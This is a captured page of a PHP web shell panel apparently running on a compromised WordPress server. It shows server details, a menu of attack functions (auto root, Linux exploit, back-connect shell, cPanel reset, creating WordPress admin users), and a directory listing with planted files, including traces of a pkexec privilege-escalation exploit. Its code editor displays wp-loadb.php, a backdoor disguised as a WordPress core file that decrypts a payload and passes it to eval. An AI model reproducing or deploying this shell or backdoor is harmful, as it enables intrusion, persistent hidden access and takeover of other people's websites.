Linux host17.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 199.188.200.68 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
8.1.33
shipvipnc2024
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
shipvipnc2024 /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
026b3c
[ DIR ]
drwxr-xr-x
3fbe1
[ DIR ]
dr-xr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
item
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.hta
6.54
KB
-rw-r--r--
.htaccess
717
B
-r-xr-xr-x
.index.php
2.07
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
admin.phtml
1.81
MB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
context.php
405
B
-rw-r--r--
error_log
31.51
MB
-rw-r--r--
google738db57e59672eb9.html
53
B
-rw-r--r--
google8fab2a5bdb4dc80e.html
53
B
-rw-r--r--
googleb01f215ab4c25d03.html
53
B
-rw-r--r--
googlecb7c0319e31f0be0.html
53
B
-rw-r--r--
googled24b00a99624db3b.html
53
B
-rw-r--r--
googledc308e72d25873da.html
53
B
-rw-r--r--
index.php
2.07
KB
-r--r--r--
robots.txt
343
B
-r--r--r--
style2025.php
4.19
KB
-rw-r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-blog-header.php
541
B
-rw-r--r--
wp-bot.php
1.82
KB
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
2.83
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.95
KB
-rw-r--r--
wp-loada.php
2.32
KB
-rw-r--r--
wp-loadb.php
2.14
KB
-rw-r--r--
wp-login.php
50.16
KB
-rw-r--r--
wp-mail.php
8.34
KB
-rw-r--r--
wp-settings.php
28.35
KB
-rw-r--r--
wp-signup.php
33.58
KB
-rw-r--r--
wp-trackback.php
4.98
KB
-rw-r--r--
xmlrpc.php
3.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-loadb.php
<?php class Secure{ private $masterKey; private $iterations = 10000; private $cipher = 'aes-256-cbc'; private $hmacAlgo = 'sha256'; private $saltLength = 16; public function __construct($masterKey) { $this->masterKey = $masterKey; } public function Soyt($en) { $data = base64_decode($en); $salt = substr($data, 0, $this->saltLength); $ivLength = openssl_cipher_iv_length($this->cipher); $iv = substr($data, $this->saltLength, $ivLength); $hmac = substr($data, $this->saltLength + $ivLength, $this->hmacLength()); $ciphertext = substr($data, $this->saltLength + $ivLength + $this->hmacLength()); $derivedKeys = $this->deriveKeys($salt); $calcHmac = hash_hmac( $this->hmacAlgo, $iv . $salt . $ciphertext, $derivedKeys['hmac'], true ); if (!$this->verifyHmac($calcHmac, $hmac)) { return false; } return openssl_decrypt( $ciphertext, $this->cipher, $derivedKeys['encryption'], OPENSSL_RAW_DATA, $iv ); } private function deriveKeys($salt) { $keyMaterial = hash_pbkdf2( $this->hmacAlgo, $this->masterKey, $salt, $this->iterations, 64, true ); return [ 'encryption' => substr($keyMaterial, 0, 32), 'hmac' => substr($keyMaterial, 32) ]; } private function verifyHmac($knownHmac, $userHmac) { return hash_equals($knownHmac, $userHmac); } private function hmacLength() { return strlen(hash($this->hmacAlgo, '', true)); } public function setIterations($iterations) { $this->iterations = (int)$iterations; return $this; } public function setCipher($cipher) { if (!in_array($cipher, openssl_get_cipher_methods())) { throw new RuntimeException('found'); } $this->cipher = $cipher; return $this; } } eval($a);
Close